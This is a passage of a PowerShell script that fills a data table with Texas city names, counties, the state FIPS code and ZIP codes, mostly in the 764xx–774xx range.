$Cities.Rows.Add("Scotland","Archer","Texas","TX","48","76379") + $null = $Cities.Rows.Add("Seymour","Baylor","Texas","TX","48","76380") + $null = $Cities.Rows.Add("Vernon","Wilbarger","Texas","TX","48","76384") + $null = $Cities.Rows.Add("Weinert","Haskell","Texas","TX","48","76388") + $null = $Cities.Rows.Add("Windthorst","Archer","Texas","TX","48","76389") + $null = $Cities.Rows.Add("Zcta 763hh","Archer","Texas","TX","48","763HH") + $null = $Cities.Rows.Add("Zcta 763xx","Archer","Texas","TX","48","763XX") + $null = $Cities.Rows.Add("Stephenville","Erath","Texas","TX","48","76401") + $null = $Cities.Rows.Add("Breckenridge","Stephens","Texas","TX","48","76424") + $null = $Cities.Rows.Add("Bridgeport","Wise","Texas","TX","48","76426") + $null = $Cities.Rows.Add("Bryson","Jack","Texas","TX","48","76427") + $null = $Cities.Rows.Add("Caddo","Stephens","Texas","TX","48","76429") + $null = $Cities.Rows.Add("Albany","Shackelford","Texas","TX","48","76430") + $null = $Cities.Rows.Add("Chico","Wise","Texas","TX","48","76431") + $null = $Cities.Rows.Add("Blanket","Brown","Texas","TX","48","76432") + $null = $Cities.Rows.Add("Bluff dale","Erath","Texas","TX","48","76433") + $null = $Cities.Rows.Add("Carbon","Eastland","Texas","TX","48","76435") + $null = $Cities.Rows.Add("Carlton","Hamilton","Texas","TX","48","76436") + $null = $Cities.Rows.Add("Cisco","Eastland","Texas","TX","48","76437") + $null = $Cities.Rows.Add("Comanche","Comanche","Texas","TX","48","76442") + $null = $Cities.Rows.Add("Cross plains","Callahan","Texas","TX","48","76443") + $null = $Cities.Rows.Add("De leon","Comanche","Texas","TX","48","76444") + $null = $Cities.Rows.Add("Desdemona","Eastland","Texas","TX","48","76445") + $null = $Cities.Rows.Add("Dublin","Erath","Texas","TX","48","76446") + $null = $Cities.Rows.Add("Eastland","Eastland","Texas","TX","48","76448") + $null = $Cities.Rows.Add("Graford","Palo Pinto","Texas","TX","48","76449") + $null = $Cities.Rows.Add("Graham","Young","Texas","TX","48","76450") + $null = $Cities.Rows.Add("Energy","Comanche","Texas","TX","48","76452") + $null = $Cities.Rows.Add("Gordon","Palo Pinto","Texas","TX","48","76453") + $null = $Cities.Rows.Add("Gorman","Eastland","Texas","TX","48","76454") + $null = $Cities.Rows.Add("Gustine","Comanche","Texas","TX","48","76455") + $null = $Cities.Rows.Add("Hico","Hamilton","Texas","TX","48","76457") + $null = $Cities.Rows.Add("Jacksboro","Jack","Texas","TX","48","76458") + $null = $Cities.Rows.Add("Jermyn","Jack","Texas","TX","48","76459") + $null = $Cities.Rows.Add("Loving","Young","Texas","TX","48","76460") + $null = $Cities.Rows.Add("Lipan","Hood","Texas","TX","48","76462") + $null = $Cities.Rows.Add("Mingus","Erath","Texas","TX","48","76463") + $null = $Cities.Rows.Add("Moran","Shackelford","Texas","TX","48","76464") + $null = $Cities.Rows.Add("Olden","Eastland","Texas","TX","48","76466") + $null = $Cities.Rows.Add("Proctor","Comanche","Texas","TX","48","76468") + $null = $Cities.Rows.Add("Putnam","Callahan","Texas","TX","48","76469") + $null = $Cities.Rows.Add("Ranger","Eastland","Texas","TX","48","76470") + $null = $Cities.Rows.Add("Rising star","Eastland","Texas","TX","48","76471") + $null = $Cities.Rows.Add("Santo","Palo Pinto","Texas","TX","48","76472") + $null = $Cities.Rows.Add("Sidney","Comanche","Texas","TX","48","76474") + $null = $Cities.Rows.Add("Strawn","Palo Pinto","Texas","TX","48","76475") + $null = $Cities.Rows.Add("Tolar","Hood","Texas","TX","48","76476") + $null = $Cities.Rows.Add("South bend","Young","Texas","TX","48","76481") + $null = $Cities.Rows.Add("Throckmorton","Throckmorton","Texas","TX","48","76483") + $null = $Cities.Rows.Add("Palo pinto","Palo Pinto","Texas","TX","48","76484") + $null = $Cities.Rows.Add("Perrin","Jack","Texas","TX","48","76486") + $null = $Cities.Rows.Add("Poolville","Parker","Texas","TX","48","76487") + $null = $Cities.Rows.Add("Whitt","Parker","Texas","TX","48","76490") + $null = $Cities.Rows.Add("Woodson","Throckmorton","Texas","TX","48","76491") + $null = $Cities.Rows.Add("Zcta 764hh","Comanche","Texas","TX","48","764HH") + $null = $Cities.Rows.Add("Zcta 764xx","Shackelford","Texas","TX","48","764XX") + $null = $Cities.Rows.Add("Temple","Bell","Texas","TX","48","76501") + $null = $Cities.Rows.Add("Temple","Bell","Texas","TX","48","76502") + $null = $Cities.Rows.Add("Temple","Bell","Texas","TX","48","76504") + $null = $Cities.Rows.Add("Bartlett","Williamson","Texas","TX","48","76511") + $null = $Cities.Rows.Add("Belton","Bell","Texas","TX","48","76513") + $null = $Cities.Rows.Add("Buckholts","Milam","Texas","TX","48","76518") + $null = $Cities.Rows.Add("Burlington","Milam","Texas","TX","48","76519") + $null = $Cities.Rows.Add("Cameron","Milam","Texas","TX","48","76520") + $null = $Cities.Rows.Add("Izoro","Coryell","Texas","TX","48","76522") + $null = $Cities.Rows.Add("Davilla","Milam","Texas","TX","48","76523") + $null = $Cities.Rows.Add("Eddy","McLennan","Texas","TX","48","76524") + $null = $Cities.Rows.Add("Bee house","Coryell","Texas","TX","48","76525") + $null = $Cities.Rows.Add("Florence","Williamson","Texas","TX","48","76527") + $null = $Cities.Rows.Add("Turnersville","Coryell","Texas","TX","48","76528") + $null = $Cities.Rows.Add("Granger","Williamson","Texas","TX","48","76530") + $null = $Cities.Rows.Add("Hamilton","Hamilton","Texas","TX","48","76531") + $null = $Cities.Rows.Add("Holland","Bell","Texas","TX","48","76534") + $null = $Cities.Rows.Add("Jarrell","Williamson","Texas","TX","48","76537") + $null = $Cities.Rows.Add("Jonesboro","Coryell","Texas","TX","48","76538") + $null = $Cities.Rows.Add("Kempner","Lampasas","Texas","TX","48","76539") + $null = $Cities.Rows.Add("Killeen","Bell","Texas","TX","48","76541") + $null = $Cities.Rows.Add("Harker heights","Bell","Texas","TX","48","76542") + $null = $Cities.Rows.Add("Harker heights","Bell","Texas","TX","48","76543") + $null = $Cities.Rows.Add("Fort hood","Bell","Texas","TX","48","76544") + $null = $Cities.Rows.Add("Zcta 76548","Bell","Texas","TX","48","76548") + $null = $Cities.Rows.Add("Zcta 76549","Bell","Texas","TX","48","76549") + $null = $Cities.Rows.Add("Lampasas","Lampasas","Texas","TX","48","76550") + $null = $Cities.Rows.Add("Little river","Bell","Texas","TX","48","76554") + $null = $Cities.Rows.Add("Milano","Milam","Texas","TX","48","76556") + $null = $Cities.Rows.Add("Moody","McLennan","Texas","TX","48","76557") + $null = $Cities.Rows.Add("Nolanville","Bell","Texas","TX","48","76559") + $null = $Cities.Rows.Add("Oglesby","Coryell","Texas","TX","48","76561") + $null = $Cities.Rows.Add("Pottsville","Hamilton","Texas","TX","48","76565") + $null = $Cities.Rows.Add("Purmela","Coryell","Texas","TX","48","76566") + $null = $Cities.Rows.Add("Rockdale","Milam","Texas","TX","48","76567") + $null = $Cities.Rows.Add("Rogers","Bell","Texas","TX","48","76569") + $null = $Cities.Rows.Add("Rosebud","Falls","Texas","TX","48","76570") + $null = $Cities.Rows.Add("Salado","Bell","Texas","TX","48","76571") + $null = $Cities.Rows.Add("Taylor","Williamson","Texas","TX","48","76574") + $null = $Cities.Rows.Add("Thorndale","Milam","Texas","TX","48","76577") + $null = $Cities.Rows.Add("Thrall","Williamson","Texas","TX","48","76578") + $null = $Cities.Rows.Add("Troy","Bell","Texas","TX","48","76579") + $null = $Cities.Rows.Add("Zcta 765hh","Bell","Texas","TX","48","765HH") + $null = $Cities.Rows.Add("Zcta 765xx","Bell","Texas","TX","48","765XX") + $null = $Cities.Rows.Add("Abbott","Hill","Texas","TX","48","76621") + $null = $Cities.Rows.Add("Aquilla","Hill","Texas","TX","48","76622") + $null = $Cities.Rows.Add("Axtell","McLennan","Texas","TX","48","76624") + $null = $Cities.Rows.Add("Blooming grove","Navarro","Texas","TX","48","76626") + $null = $Cities.Rows.Add("Blum","Hill","Texas","TX","48","76627") + $null = $Cities.Rows.Add("Brandon","Hill","Texas","TX","48","76628") + $null = $Cities.Rows.Add("Bremond","Robertson","Texas","TX","48","76629") + $null = $Cities.Rows.Add("Bruceville","McLennan","Texas","TX","48","76630") + $null = $Cities.Rows.Add("Bynum","Hill","Texas","TX","48","76631") + $null = $Cities.Rows.Add("Chilton","Falls","Texas","TX","48","76632") + $null = $Cities.Rows.Add("China spring","McLennan","Texas","TX","48","76633") + $null = $Cities.Rows.Add("Laguna park","Bosque","Texas","TX","48","76634") + $null = $Cities.Rows.Add("Coolidge","Limestone","Texas","TX","48","76635") + $null = $Cities.Rows.Add("Covington","Hill","Texas","TX","48","76636") + $null = $Cities.Rows.Add("Cranfills gap","Bosque","Texas","TX","48","76637") + $null = $Cities.Rows.Add("Crawford","McLennan","Texas","TX","48","76638") + $null = $Cities.Rows.Add("Dawson","Navarro","Texas","TX","48","76639") + $null = $Cities.Rows.Add("Elm mott","McLennan","Texas","TX","48","76640") + $null = $Cities.Rows.Add("Frost","Navarro","Texas","TX","48","76641") + $null = $Cities.Rows.Add("Groesbeck","Limestone","Texas","TX","48","76642") + $null = $Cities.Rows.Add("Hewitt","McLennan","Texas","TX","48","76643") + $null = $Cities.Rows.Add("Hillsboro","Hill","Texas","TX","48","76645") + $null = $Cities.Rows.Add("Hubbard","Hill","Texas","TX","48","76648") + $null = $Cities.Rows.Add("Iredell","Bosque","Texas","TX","48","76649") + $null = $Cities.Rows.Add("Italy","Ellis","Texas","TX","48","76651") + $null = $Cities.Rows.Add("Kopperl","Bosque","Texas","TX","48","76652") + $null = $Cities.Rows.Add("Kosse","Limestone","Texas","TX","48","76653") + $null = $Cities.Rows.Add("Lorena","McLennan","Texas","TX","48","76655") + $null = $Cities.Rows.Add("Lott","Falls","Texas","TX","48","76656") + $null = $Cities.Rows.Add("Mc gregor","McLennan","Texas","TX","48","76657") + $null = $Cities.Rows.Add("Malone","Hill","Texas","TX","48","76660") + $null = $Cities.Rows.Add("Marlin","Falls","Texas","TX","48","76661") + $null = $Cities.Rows.Add("Mart","McLennan","Texas","TX","48","76664") + $null = $Cities.Rows.Add("Meridian","Bosque","Texas","TX","48","76665") + $null = $Cities.Rows.Add("Mertens","Hill","Texas","TX","48","76666") + $null = $Cities.Rows.Add("Mexia","Limestone","Texas","TX","48","76667") + $null = $Cities.Rows.Add("Milford","Ellis","Texas","TX","48","76670") + $null = $Cities.Rows.Add("Morgan","Bosque","Texas","TX","48","76671") + $null = $Cities.Rows.Add("Mount calm","Hill","Texas","TX","48","76673") + $null = $Cities.Rows.Add("Otto","Falls","Texas","TX","48","76675") + $null = $Cities.Rows.Add("Penelope","Hill","Texas","TX","48","76676") + $null = $Cities.Rows.Add("Prairie hill","Limestone","Texas","TX","48","76678") + $null = $Cities.Rows.Add("Purdon","Navarro","Texas","TX","48","76679") + $null = $Cities.Rows.Add("Reagan","Falls","Texas","TX","48","76680") + $null = $Cities.Rows.Add("Richland","Navarro","Texas","TX","48","76681") + $null = $Cities.Rows.Add("Riesel","McLennan","Texas","TX","48","76682") + $null = $Cities.Rows.Add("Satin","Falls","Texas","TX","48","76685") + $null = $Cities.Rows.Add("Tehuacana","Limestone","Texas","TX","48","76686") + $null = $Cities.Rows.Add("Thornton","Limestone","Texas","TX","48","76687") + $null = $Cities.Rows.Add("Valley mills","Bosque","Texas","TX","48","76689") + $null = $Cities.Rows.Add("Walnut springs","Bosque","Texas","TX","48","76690") + $null = $Cities.Rows.Add("West","McLennan","Texas","TX","48","76691") + $null = $Cities.Rows.Add("Bonanza","Hill","Texas","TX","48","76692") + $null = $Cities.Rows.Add("Wortham","Freestone","Texas","TX","48","76693") + $null = $Cities.Rows.Add("Zcta 766hh","Bosque","Texas","TX","48","766HH") + $null = $Cities.Rows.Add("Waco","McLennan","Texas","TX","48","76701") + $null = $Cities.Rows.Add("Bellmead","McLennan","Texas","TX","48","76704") + $null = $Cities.Rows.Add("Bellmead","McLennan","Texas","TX","48","76705") + $null = $Cities.Rows.Add("Waco","McLennan","Texas","TX","48","76706") + $null = $Cities.Rows.Add("Waco","McLennan","Texas","TX","48","76707") + $null = $Cities.Rows.Add("Waco","McLennan","Texas","TX","48","76708") + $null = $Cities.Rows.Add("Waco","McLennan","Texas","TX","48","76710") + $null = $Cities.Rows.Add("Beverly hills","McLennan","Texas","TX","48","76711") + $null = $Cities.Rows.Add("Woodway","McLennan","Texas","TX","48","76712") + $null = $Cities.Rows.Add("Waco","McLennan","Texas","TX","48","76798") + $null = $Cities.Rows.Add("Zcta 767hh","McLennan","Texas","TX","48","767HH") + $null = $Cities.Rows.Add("Early","Brown","Texas","TX","48","76801") + $null = $Cities.Rows.Add("Zcta 76802","Brown","Texas","TX","48","76802") + $null = $Cities.Rows.Add("Ballinger","Runnels","Texas","TX","48","76821") + $null = $Cities.Rows.Add("Bangs","Brown","Texas","TX","48","76823") + $null = $Cities.Rows.Add("Bend","Lampasas","Texas","TX","48","76824") + $null = $Cities.Rows.Add("Fife","McCulloch","Texas","TX","48","76825") + $null = $Cities.Rows.Add("Brookesmith","Brown","Texas","TX","48","76827") + $null = $Cities.Rows.Add("Burkett","Coleman","Texas","TX","48","76828") + $null = $Cities.Rows.Add("Castell","Llano","Texas","TX","48","76831") + $null = $Cities.Rows.Add("Cherokee","San Saba","Texas","TX","48","76832") + $null = $Cities.Rows.Add("Coleman","Coleman","Texas","TX","48","76834") + $null = $Cities.Rows.Add("Eden","Concho","Texas","TX","48","76837") + $null = $Cities.Rows.Add("Fort mc kavett","Menard","Texas","TX","48","76841") + $null = $Cities.Rows.Add("Fredonia","Mason","Texas","TX","48","76842") + $null = $Cities.Rows.Add("Goldthwaite","Mills","Texas","TX","48","76844") + $null = $Cities.Rows.Add("Gouldbusk","Coleman","Texas","TX","48","76845") + $null = $Cities.Rows.Add("Hext","Menard","Texas","TX","48","76848") + $null = $Cities.Rows.Add("Junction","Kimble","Texas","TX","48","76849") + $null = $Cities.Rows.Add("Lohn","McCulloch","Texas","TX","48","76852") + $null = $Cities.Rows.Add("Lometa","Lampasas","Texas","TX","48","76853") + $null = $Cities.Rows.Add("London","Kimble","Texas","TX","48","76854") + $null = $Cities.Rows.Add("Mason","Mason","Texas","TX","48","76856") + $null = $Cities.Rows.Add("May","Brown","Texas","TX","48","76857") + $null = $Cities.Rows.Add("Melvin","McCulloch","Texas","TX","48","76858") + $null = $Cities.Rows.Add("Menard","Menard","Texas","TX","48","76859") + $null = $Cities.Rows.Add("Miles","Runnels","Texas","TX","48","76861") + $null = $Cities.Rows.Add("Millersview","Concho","Texas","TX","48","76862") + $null = $Cities.Rows.Add("Mullin","Mills","Texas","TX","48","76864") + $null = $Cities.Rows.Add("Norton","Runnels","Texas","TX","48","76865") + $null = $Cities.Rows.Add("Paint rock","Concho","Texas","TX","48","76866") + $null = $Cities.Rows.Add("Pontotoc","Mason","Texas","TX","48","76869") + $null = $Cities.Rows.Add("Priddy","Mills","Texas","TX","48","76870") + $null = $Cities.Rows.Add("Richland springs","San Saba","Texas","TX","48","76871") + $null = $Cities.Rows.Add("Rochelle","McCulloch","Texas","TX","48","76872") + $null = $Cities.Rows.Add("Rockwood","Coleman","Texas","TX","48","76873") + $null = $Cities.Rows.Add("Roosevelt","Kimble","Texas","TX","48","76874") + $null = $Cities.Rows.Add("Rowena","Runnels","Texas","TX","48","76875") + $null = $Cities.Rows.Add("San saba","San Saba","Texas","TX","48","76877") + $null = $Cities.Rows.Add("Santa anna","Coleman","Texas","TX","48","76878") + $null = $Cities.Rows.Add("Talpa","Coleman","Texas","TX","48","76882") + $null = $Cities.Rows.Add("Valera","Coleman","Texas","TX","48","76884") + $null = $Cities.Rows.Add("Valley spring","Llano","Texas","TX","48","76885") + $null = $Cities.Rows.Add("Voca","McCulloch","Texas","TX","48","76887") + $null = $Cities.Rows.Add("Leaday","Coleman","Texas","TX","48","76888") + $null = $Cities.Rows.Add("Zephyr","Brown","Texas","TX","48","76890") + $null = $Cities.Rows.Add("Zcta 768hh","Brown","Texas","TX","48","768HH") + $null = $Cities.Rows.Add("Zcta 768xx","McCulloch","Texas","TX","48","768XX") + $null = $Cities.Rows.Add("San angelo","Tom Green","Texas","TX","48","76901") + $null = $Cities.Rows.Add("San angelo","Tom Green","Texas","TX","48","76903") + $null = $Cities.Rows.Add("San angelo","Tom Green","Texas","TX","48","76904") + $null = $Cities.Rows.Add("San angelo","Tom Green","Texas","TX","48","76905") + $null = $Cities.Rows.Add("Barnhart","Irion","Texas","TX","48","76930") + $null = $Cities.Rows.Add("Best","Reagan","Texas","TX","48","76932") + $null = $Cities.Rows.Add("Bronte","Coke","Texas","TX","48","76933") + $null = $Cities.Rows.Add("Carlsbad","Tom Green","Texas","TX","48","76934") + $null = $Cities.Rows.Add("Christoval","Tom Green","Texas","TX","48","76935") + $null = $Cities.Rows.Add("Eldorado","Schleicher","Texas","TX","48","76936") + $null = $Cities.Rows.Add("Eola","Concho","Texas","TX","48","76937") + $null = $Cities.Rows.Add("Mereta","Tom Green","Texas","TX","48","76940") + $null = $Cities.Rows.Add("Mertzon","Irion","Texas","TX","48","76941") + $null = $Cities.Rows.Add("Ozona","Crockett","Texas","TX","48","76943") + $null = $Cities.Rows.Add("Robert lee","Coke","Texas","TX","48","76945") + $null = $Cities.Rows.Add("Silver","Coke","Texas","TX","48","76949") + $null = $Cities.Rows.Add("Sonora","Sutton","Texas","TX","48","76950") + $null = $Cities.Rows.Add("Sterling city","Sterling","Texas","TX","48","76951") + $null = $Cities.Rows.Add("Tennyson","Coke","Texas","TX","48","76953") + $null = $Cities.Rows.Add("Vancourt","Tom Green","Texas","TX","48","76955") + $null = $Cities.Rows.Add("Water valley","Tom Green","Texas","TX","48","76958") + $null = $Cities.Rows.Add("Zcta 769hh","Coke","Texas","TX","48","769HH") + $null = $Cities.Rows.Add("Zcta 769xx","Crockett","Texas","TX","48","769XX") + $null = $Cities.Rows.Add("Houston","Harris","Texas","TX","48","77002") + $null = $Cities.Rows.Add("Houston","Harris","Texas","TX","48","77003") + $null = $Cities.Rows.Add("Houston","Harris","Texas","TX","48","77004") + $null = $Cities.Rows.Add("Houston","Harris","Texas","TX","48","77005") + $null = $Cities.Rows.Add("Houston","Harris","Texas","TX","48","77006") + $null = $Cities.Rows.Add("Houston","Harris","Texas","TX","48","77007") + $null = $Cities.Rows.Add("Houston","Harris","Texas","TX","48","77008") + $null = $Cities.Rows.Add("Houston","Harris","Texas","TX","48","77009") + $null = $Cities.Rows.Add("Houston","Harris","Texas","TX","48","77010") + $null = $Cities.Rows.Add("Houston","Harris","Texas","TX","48","77011") + $null = $Cities.Rows.Add("Houston","Harris","Texas","TX","48","77012") + $null = $Cities.Rows.Add("Houston","Harris","Texas","TX","48","77013") + $null = $Cities.Rows.Add("Houston","Harris","Texas","TX","48","77014") + $null = $Cities.Rows.Add("Houston","Harris","Texas","TX","48","77015") + $null = $Cities.Rows.Add("Houston","Harris","Texas","TX","48","77016") + $null = $Cities.Rows.Add("Houston","Harris","Texas","TX","48","77017") + $null = $Cities.Rows.Add("Houston","Harris","Texas","TX","48","77018") + $null = $Cities.Rows.Add("Houston","Harris","Texas","TX","48","77019") + $null = $Cities.Rows.Add("Houston","Harris","Texas","TX","48","77020") + $null = $Cities.Rows.Add("Houston","Harris","Texas","TX","48","77021") + $null = $Cities.Rows.Add("Houston","Harris","Texas","TX","48","77022") + $null = $Cities.Rows.Add("Houston","Harris","Texas","TX","48","77023") + $null = $Cities.Rows.Add("Houston","Harris","Texas","TX","48","77024") + $null = $Cities.Rows.Add("Houston","Harris","Texas","TX","48","77025") + $null = $Cities.Rows.Add("Houston","Harris","Texas","TX","48","77026") + $null = $Cities.Rows.Add("Houston","Harris","Texas","TX","48","77027") + $null = $Cities.Rows.Add("Houston","Harris","Texas","TX","48","77028") + $null = $Cities.Rows.Add("Jacinto city","Harris","Texas","TX","48","77029") + $null = $Cities.Rows.Add("V a hospital","Harris","Texas","TX","48","77030") + $null = $Cities.Rows.Add("Houston","Harris","Texas","TX","48","77031") + $null = $Cities.Rows.Add("Houston","Harris","Texas","TX","48","77032") + $null = $Cities.Rows.Add("Houston","Harris","Texas","TX","48","77033") + $null = $Cities.Rows.Add("Houston","Harris","Texas","TX","48","77034") + $null = $Cities.Rows.Add("Houston","Harris","Texas","TX","48","77035") + $null = $Cities.Rows.Add("Houston","Harris","Texas","TX","48","77036") + $null = $Cities.Rows.Add("Houston","Harris","Texas","TX","48","77037") + $null = $Cities.Rows.Add("Houston","Harris","Texas","TX","48","77038") + $null = $Cities.Rows.Add("Houston","Harris","Texas","TX","48","77039") + $null = $Cities.Rows.Add("Jersey village","Harris","Texas","TX","48","77040") + $null = $Cities.Rows.Add("Houston","Harris","Texas","TX","48","77041") + $null = $Cities.Rows.Add("Houston","Harris","Texas","TX","48","77042") + $null = $Cities.Rows.Add("Houston","Harris","Texas","TX","48","77043") + $null = $Cities.Rows.Add("Houston","Harris","Texas","TX","48","77044") + $null = $Cities.Rows.Add("Houston","Harris","Texas","TX","48","77045") + $null = $Cities.Rows.Add("Houston","Harris","Texas","TX","48","77046") + $null = $Cities.Rows.Add("Houston","Harris","Texas","TX","48","77047") + $null = $Cities.Rows.Add("Houston","Harris","Texas","TX","48","77048") + $null = $Cities.Rows.Add("Houston","Harris","Texas","TX","48","77049") + $null = $Cities.Rows.Add("Houston","Harris","Texas","TX","48","77050") + $null = $Cities.Rows.Add("Houston","Harris","Texas","TX","48","77051") + $null = $Cities.Rows.Add("Houston","Fort Bend","Texas","TX","48","77053") + $null = $Cities.Rows.Add("Houston","Harris","Texas","TX","48","77054") + $null = $Cities.Rows.Add("Houston","Harris","Texas","TX","48","77055") + $null = $Cities.Rows.Add("Houston","Harris","Texas","TX","48","77056") + $null = $Cities.Rows.Add("Houston","Harris","Texas","TX","48","77057") + $null = $Cities.Rows.Add("Houston","Harris","Texas","TX","48","77058") + $null = $Cities.Rows.Add("Houston","Harris","Texas","TX","48","77059") + $null = $Cities.Rows.Add("Houston","Harris","Texas","TX","48","77060") + $null = $Cities.Rows.Add("Houston","Harris","Texas","TX","48","77061") + $null = $Cities.Rows.Add("Houston","Harris","Texas","TX","48","77062") + $null = $Cities.Rows.Add("Houston","Harris","Texas","TX","48","77063") + $null = $Cities.Rows.Add("Houston","Harris","Texas","TX","48","77064") + $null = $Cities.Rows.Add("Houston","Harris","Texas","TX","48","77065") + $null = $Cities.Rows.Add("Houston","Harris","Texas","TX","48","77066") + $null = $Cities.Rows.Add("Houston","Harris","Texas","TX","48","77067") + $null = $Cities.Rows.Add("Houston","Harris","Texas","TX","48","77068") + $null = $Cities.Rows.Add("Houston","Harris","Texas","TX","48","77069") + $null = $Cities.Rows.Add("Houston","Harris","Texas","TX","48","77070") + $null = $Cities.Rows.Add("Houston","Harris","Texas","TX","48","77071") + $null = $Cities.Rows.Add("Houston","Harris","Texas","TX","48","77072") + $null = $Cities.Rows.Add("Houston","Harris","Texas","TX","48","77073") + $null = $Cities.Rows.Add("Houston","Harris","Texas","TX","48","77074") + $null = $Cities.Rows.Add("Houston","Harris","Texas","TX","48","77075") + $null = $Cities.Rows.Add("Houston","Harris","Texas","TX","48","77076") + $null = $Cities.Rows.Add("Houston","Harris","Texas","TX","48","77077") + $null = $Cities.Rows.Add("Houston","Harris","Texas","TX","48","77078") + $null = $Cities.Rows.Add("Houston","Harris","Texas","TX","48","77079") + $null = $Cities.Rows.Add("Houston","Harris","Texas","TX","48","77080") + $null = $Cities.Rows.Add("Houston","Harris","Texas","TX","48","77081") + $null = $Cities.Rows.Add("Houston","Harris","Texas","TX","48","77082") + $null = $Cities.Rows.Add("Houston","Harris","Texas","TX","48","77083") + $null = $Cities.Rows.Add("Houston","Harris","Texas","TX","48","77084") + $null = $Cities.Rows.Add("Houston","Harris","Texas","TX","48","77085") + $null = $Cities.Rows.Add("Houston","Harris","Texas","TX","48","77086") + $null = $Cities.Rows.Add("Houston","Harris","Texas","TX","48","77087") + $null = $Cities.Rows.Add("Houston","Harris","Texas","TX","48","77088") + $null = $Cities.Rows.Add("Houston","Harris","Texas","TX","48","77089") + $null = $Cities.Rows.Add("Houston","Harris","Texas","TX","48","77090") + $null = $Cities.Rows.Add("Houston","Harris","Texas","TX","48","77091") + $null = $Cities.Rows.Add("Houston","Harris","Texas","TX","48","77092") + $null = $Cities.Rows.Add("Houston","Harris","Texas","TX","48","77093") + $null = $Cities.Rows.Add("Houston","Harris","Texas","TX","48","77094") + $null = $Cities.Rows.Add("Houston","Harris","Texas","TX","48","77095") + $null = $Cities.Rows.Add("Houston","Harris","Texas","TX","48","77096") + $null = $Cities.Rows.Add("Houston","Harris","Texas","TX","48","77098") + $null = $Cities.Rows.Add("Houston","Harris","Texas","TX","48","77099") + $null = $Cities.Rows.Add("Houston","Harris","Texas","TX","48","770HH") + $null = $Cities.Rows.Add("Conroe","Montgomery","Texas","TX","48","77301") + $null = $Cities.Rows.Add("Grangerland","Montgomery","Texas","TX","48","77302") + $null = $Cities.Rows.Add("Cut and shoot","Montgomery","Texas","TX","48","77303") + $null = $Cities.Rows.Add("Panorama village","Montgomery","Texas","TX","48","77304") + $null = $Cities.Rows.Add("Zcta 77306","Montgomery","Texas","TX","48","77306") + $null = $Cities.Rows.Add("Zcta 77316","Montgomery","Texas","TX","48","77316") + $null = $Cities.Rows.Add("Zcta 77318","Montgomery","Texas","TX","48","77318") + $null = $Cities.Rows.Add("Zcta 77320","Walker","Texas","TX","48","77320") + $null = $Cities.Rows.Add("Ace","Polk","Texas","TX","48","77326") + $null = $Cities.Rows.Add("Cleveland","Liberty","Texas","TX","48","77327") + $null = $Cities.Rows.Add("Coldspring","San Jacinto","Texas","TX","48","77331") + $null = $Cities.Rows.Add("Dobbin","Montgomery","Texas","TX","48","77333") + $null = $Cities.Rows.Add("Dodge","Walker","Texas","TX","48","77334") + $null = $Cities.Rows.Add("Goodrich","Polk","Texas","TX","48","77335") + $null = $Cities.Rows.Add("Huffman","Harris","Texas","TX","48","77336") + $null = $Cities.Rows.Add("Humble","Harris","Texas","TX","48","77338") + $null = $Cities.Rows.Add("Humble","Harris","Texas","TX","48","77339") + $null = $Cities.Rows.Add("Huntsville","Walker","Texas","TX","48","77340") + $null = $Cities.Rows.Add("Huntsville","Walker","Texas","TX","48","77341") + $null = $Cities.Rows.Add("Humble","Harris","Texas","TX","48","77345") + $null = $Cities.Rows.Add("Humble","Harris","Texas","TX","48","77346") + $null = $Cities.Rows.Add("Segno","Polk","Texas","TX","48","77351") + $null = $Cities.Rows.Add("Zcta 77354","Montgomery","Texas","TX","48","77354") + $null = $Cities.Rows.Add("Magnolia","Montgomery","Texas","TX","48","77355") + $null = $Cities.Rows.Add("Montgomery","Montgomery","Texas","TX","48","77356") + $null = $Cities.Rows.Add("New caney","Montgomery","Texas","TX","48","77357") + $null = $Cities.Rows.Add("New waverly","Walker","Texas","TX","48","77358") + $null = $Cities.Rows.Add("Oakhurst","San Jacinto","Texas","TX","48","77359") + $null = $Cities.Rows.Add("Onalaska","Polk","Texas","TX","48","77360") + $null = $Cities.Rows.Add("Pinehurst","Montgomery","Texas","TX","48","77362") + $null = $Cities.Rows.Add("Plantersville","Grimes","Texas","TX","48","77363") + $null = $Cities.Rows.Add("Pointblank","San Jacinto","Texas","TX","48","77364") + $null = $Cities.Rows.Add("Porter","Montgomery","Texas","TX","48","77365") + $null = $Cities.Rows.Add("Riverside","Walker","Texas","TX","48","77367") + $null = $Cities.Rows.Add("Romayor","Liberty","Texas","TX","48","77368") + $null = $Cities.Rows.Add("Rye","Liberty","Texas","TX","48","77369") + $null = $Cities.Rows.Add("Shepherd","San Jacinto","Texas","TX","48","77371") + $null = $Cities.Rows.Add("Splendora","Montgomery","Texas","TX","48","77372") + $null = $Cities.Rows.Add("Spring","Harris","Texas","TX","48","77373") + $null = $Cities.Rows.Add("Thicket","Hardin","Texas","TX","48","77374") + $null = $Cities.Rows.Add("Tomball","Harris","Texas","TX","48","77375") + $null = $Cities.Rows.Add("Votaw","Hardin","Texas","TX","48","77376") + $null = $Cities.Rows.Add("Willis","Montgomery","Texas","TX","48","77378") + $null = $Cities.Rows.Add("Klein","Harris","Texas","TX","48","77379") + $null = $Cities.Rows.Add("The woodlands","Montgomery","Texas","TX","48","77380") + $null = $Cities.Rows.Add("The woodlands","Montgomery","Texas","TX","48","77381") + $null = $Cities.Rows.Add("Spring","Montgomery","Texas","TX","48","77382") + $null = $Cities.Rows.Add("Conroe","Montgomery","Texas","TX","48","77384") + $null = $Cities.Rows.Add("Conroe","Montgomery","Texas","TX","48","77385") + $null = $Cities.Rows.Add("Spring","Montgomery","Texas","TX","48","77386") + $null = $Cities.Rows.Add("Spring","Harris","Texas","TX","48","77388") + $null = $Cities.Rows.Add("Spring","Harris","Texas","TX","48","77389") + $null = $Cities.Rows.Add("Humble","Harris","Texas","TX","48","77396") + $null = $Cities.Rows.Add("Zcta 773hh","Harris","Texas","TX","48","773HH") + $null = $Cities.Rows.Add("Zcta 773xx","Polk","Texas","TX","48","773XX") + $null = $Cities.Rows.Add("Bellaire","Harris","Texas","TX","48","77401") + $null = $Cities.Rows.Add("Altair","Colorado","Texas","TX","48","77412") + $null = $Cities.Rows.Add("Sargent","Matagorda","Texas","TX","48","77414") + $null = $Cities.Rows.Add("Cedar lane","Matagorda","Texas","TX","48","77415") + $null = $Cities.Rows.Add("Beasley","Fort Bend","Texas","TX","48","77417") + $null = $Cities.Rows.Add("Bellville","Austin","Texas","TX","48","77418") + $null = $Cities.Rows.Add("Blessing","Matagorda","Texas","TX","48","77419") + $null = $Cities.Rows.Add("Boling","Wharton","Texas","TX","48","77420") + $null = $Cities.Rows.Add("Brazoria","Brazoria","Texas","TX","48","77422") + $null = 